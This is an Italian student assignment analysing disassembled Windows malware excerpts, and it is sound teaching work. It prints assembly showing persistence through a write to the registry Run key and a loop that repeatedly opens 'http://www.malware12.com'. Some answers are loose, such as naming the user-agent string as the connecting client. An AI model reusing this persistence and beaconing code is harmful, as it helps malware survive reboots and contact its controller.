

CONSEGNA SETTIMANA 11 LEZIONE 1

Windows malware

Con riferimento agli estratti di un malware di seguito rappresentato, ci viene richiesto di rispondere alle seguenti domande.

- **PUNTO 1.** Descrivere come il malware ottiene la persistenza, evidenziando il codice assembly dove le relative istruzioni e chiamate di funzioni vengono eseguite
- **PUNTO 2.** Identificare il client software utilizzato dal malware per la connessione ad Internet
- **PUNTO 3.** Identificare l'URL al quale il malware tenta di connettersi ed evidenziare la chiamata di funzione che permette al malware di connettersi ad un URL
- **BONUS:** qual è il significato e il funzionamento del comando assembly "lea"

```
0040286F  push    2                ; samDesired
00402871  push    eax               ; ulOptions
00402872  push    offset SubKey     ; "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
00402877  push    HKEY_LOCAL_MACHINE ; hKey
0040287C  call    esi               ; RegOpenKeyExW
0040287E  test    eax, eax
00402880  jnz     short loc_4028C5
00402882
00402882  loc_402882:
00402882  lea     ecx, [esp+424h+Data]
00402886  push    ecx               ; lpString
00402887  mov     bl, 1
00402889  call    ds:strlenW
0040288F  lea     edx, [eax+eax*2]
00402893  push    edx               ; cbData
00402894  mov     edx, [esp+428h+hKey]
00402898  lea     eax, [esp+428h+Data]
0040289C  push    eax               ; lpData
0040289D  push    1                 ; dwType
0040289F  push    0                 ; Reserved
004028A1  lea     ecx, [esp+434h+ValueName]
004028A8  push    ecx               ; lpValueName
004028A9  push    edx               ; hKey
004028AA  call    ds:RegSetValueExW
```

Il malware sfrutta l'accesso e la modifica di una chiave di registro presente nel registro di sistema per ottenere la persistenza all'interno del sistema operativo anche dopo un eventuale arresto/riavvio.

Il comando LEA (load effective address) ottiene un risultato simile al comando mov ma con un approccio diverso, in grado di bypassare la ALU. In pratica il comando LEA carica in un registro l'indirizzo effettivo di una certa variabile. Lo scopo principale è quello di poter eseguire più operazioni in linea, così da risultare in un codice più compresso.

```
.text:00401150 ; !!!!!!!!!!!!!!! S U B R O U T I N E !!!!!!!!!!!!!!!
.text:00401150
.text:00401150 ; DWORD __stdcall StartAddress(LPVOID)
.text:00401150 StartAddress  proc near                ; DATA XREF: sub_401040+ECf0
.text:00401150      push    esi
.text:00401151      push    edi
.text:00401152      push    0                ; dwFlags
.text:00401154      push    0                ; lpzProxyBypass
.text:00401156      push    0                ; lpzProxy
.text:00401158      push    1                ; dwAccessType
.text:0040115A      push    offset szAgent     ; "Internet Explorer 8.0"
.text:0040115F      call    ds:InternetOpenA
.text:00401165      mov     edi, ds:InternetOpenUrlA
.text:00401168      mov     esi, eax
.text:0040116D
.text:0040116D  loc_40116D:
.text:0040116D      push    0                ; CODE XREF: StartAddress+304j
.text:0040116D      push    80000000h         ; dwContext
.text:0040116F      push    0                ; dwFlags
.text:00401174      push    0                ; dwHeadersLength
.text:00401176      push    0                ; lpzHeaders
.text:00401178      push    offset szUrl       ; "http://www.malware12.com"
.text:0040117D      push    esi               ; hInternet
.text:0040117E      call    edi               ; InternetOpenUrlA
.text:00401180      jmp     short loc_40116D
.text:00401180 StartAddress  endp
.text:00401180
```

Viene utilizzato Internet Explorer (versione 8.0) come client per la connessione ad internet.

In questa sezione del malware viene indicato <http://www.malware12.com> come URL malevolo da aprire, inoltre tramite la chiamata alla funzione per aprire l'URL risulta all'indice 0040117E.